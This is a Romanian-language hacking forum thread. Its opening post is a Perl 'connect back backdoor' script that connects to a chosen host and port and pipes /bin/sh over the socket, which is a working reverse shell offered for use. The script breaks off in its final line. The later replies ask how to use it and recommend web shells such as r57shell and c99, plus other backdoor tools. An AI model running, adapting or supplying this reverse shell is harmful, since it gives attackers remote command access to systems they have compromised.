mario23 Posted July 9, 2006 Report Posted July 9, 2006 #!/usr/bin/perl use Socket; print "Data Cha0s Connect Back Backdoornn"; if (!$ARGV[0]) { printf "Usage: $0 [Host] <Port>n"; exit(1); } print "[*] Dumping Argumentsn"; $host = $ARGV[0]; $port = 80; if ($ARGV[1]) { $port = $ARGV[1]; } print "[*] Connecting...n"; $proto = getprotobyname('tcp') || die("Unknown Protocoln"); socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Errorn"); my $target = inet_aton($host); if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) { die("Unable to Connectn"); } print "[*] Spawning Shelln"; if (!fork( )) { open(STDIN,">&SERVER"); open(STDOUT,">&SERVER"); open(STDERR,">&SERVER"); exec {'/bin/sh'} '-bash' . " Quote
Sub_Zero Posted August 23, 2006 Report Posted August 23, 2006 hey ce face exploitu asta :@ca nu m-am prins Quote
DarkWizzard Posted September 2, 2006 Report Posted September 2, 2006 asta e super bun la r57shell :@r57shell ul are incorporat perl back connect.Totusi e bun la c99. Quote
black_ps Posted October 11, 2011 Report Posted October 11, 2011 Si comenzile cum se dau? Mersi. Quote
Kabron Posted October 12, 2011 Report Posted October 12, 2011 (perl) Backdoor - r00tsecurity mai misto Quote
adi003user Posted October 12, 2011 Report Posted October 12, 2011 si weevely - Stealth tiny php backdoor - Google Project Hosting Quote